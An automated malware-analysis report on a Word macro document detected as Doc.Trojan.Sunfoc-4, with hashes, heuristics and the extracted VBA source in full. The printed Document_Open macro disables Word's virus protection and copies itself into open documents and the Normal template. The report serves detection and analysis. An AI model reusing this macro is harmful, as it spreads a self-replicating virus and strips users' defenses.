Office (OLE) malware analysis — malicious · a1cb3d04bdf5c86d

MALICIOUS

Office (OLE)

29.0 KB Created: 2000-01-23 02:53:00 Authoring application: Microsoft Word 8.0 First seen: 2015-09-15

MD5: 0c338771d40b357fad8ba7f00aeb36c0 SHA-1: 7bc386475d52ad326dfcea1980717916689ad0a8 SHA-256: a1cb3d04bdf5c86d0788cf23ff6b32d92cd63eb29102e41d26db2d4d7a9d24ea

208 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is a malicious Office document containing VBA macros. The 'Document_Open' macro attempts to disable virus protection and replicate its code into other documents and templates, which is a common tactic for malware propagation and persistence. The ClamAV detection further confirms its malicious nature.

Heuristics 4

ClamAV: Doc.Trojan.Sunfoc-4 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Sunfoc-4
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION

VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
Matched line in script
```
If B <> 1 Then D.DeleteLines 1, D.CountOfLines
```
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Private Sub Document_Open()
```

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	748 bytes
SHA-256: `1e020884142223772e7b01a350b7a6ee0fc6aa1892a1a1e9d891ac786c0231a5`
Detection ClamAV: Doc.Trojan.Sunfoc-4 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Open() Set A = Options A.VirusProtection = 0 A.SaveNormalPrompt = 0 A.ConfirmConversions = 0 For B = 1 To 3 If B = 1 Then Set C = ThisDocument If B = 2 Then Set C = ActiveDocument If B = 3 Then Set C = NormalTemplate Set D = C.VBProject.VBComponents.Item(1).CodeModule If B = 1 Then E = D.Lines(1, D.CountOfLines) If B <> 1 Then D.DeleteLines 1, D.CountOfLines If B <> 1 Then D.Addfromstring E Next ActiveDocument.SaveAs FileName:=ActiveDocument.FullName End Sub

Open this report in the interactive analyzer, or submit your own file for analysis.